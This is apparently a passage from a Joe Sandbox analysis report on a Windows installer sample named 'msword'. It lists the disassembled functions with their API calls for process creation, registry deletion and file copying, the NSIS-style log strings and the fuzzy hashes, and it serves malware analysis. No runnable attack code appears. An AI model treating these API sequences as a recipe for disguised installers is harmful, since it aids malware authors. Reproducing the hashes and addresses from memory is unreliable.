                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                          • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                        Strings
                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                        • Exec: command="%s", xrefs: 00402241
                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                        • API String ID: 2014279497-3433828417
                                                                        • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                        • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                        • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                        • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                        Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                        • GetMessagePos.USER32 ref: 00404871
                                                                        • ScreenToClient.USER32(?,?), ref: 00404889
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                        • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                        • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                        • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                        Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                        • MulDiv.KERNEL32(00022000,00000064,?), ref: 00403295
                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                        • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                        • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                        • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                        Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                        • wsprintfW.USER32 ref: 00404457
                                                                        • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s$@rD
                                                                        • API String ID: 3540041739-1813061909
                                                                        • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                        • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                        • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                        • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                        Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                        • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                        • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: *?|<>/":
                                                                        • API String ID: 589700163-165019052
                                                                        • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                        • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                        • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                        • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                        Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DeleteEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1912718029-0
                                                                        • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                        • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                        • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                        • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                        Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                        • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                        • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                        • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                        Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                        • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                        • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                        • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                        Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                        • API String ID: 1697273262-1764544995
                                                                        • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                        • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                        • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                        • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                        Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00404902
                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID: $@rD
                                                                        • API String ID: 3748168415-881980237
                                                                        • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                        • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                        • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                        • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                        Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                          • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                        • API String ID: 2577523808-3778932970
                                                                        • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                        • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                        • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                        • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                        Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcatwsprintf
                                                                        • String ID: %02x%c$...
                                                                        • API String ID: 3065427908-1057055748
                                                                        • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                        • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                        • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                        • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                        Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 00405057
                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                        • API String ID: 2266616436-4211696005
                                                                        • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                        • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                        • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                        • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                        Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00402100
                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
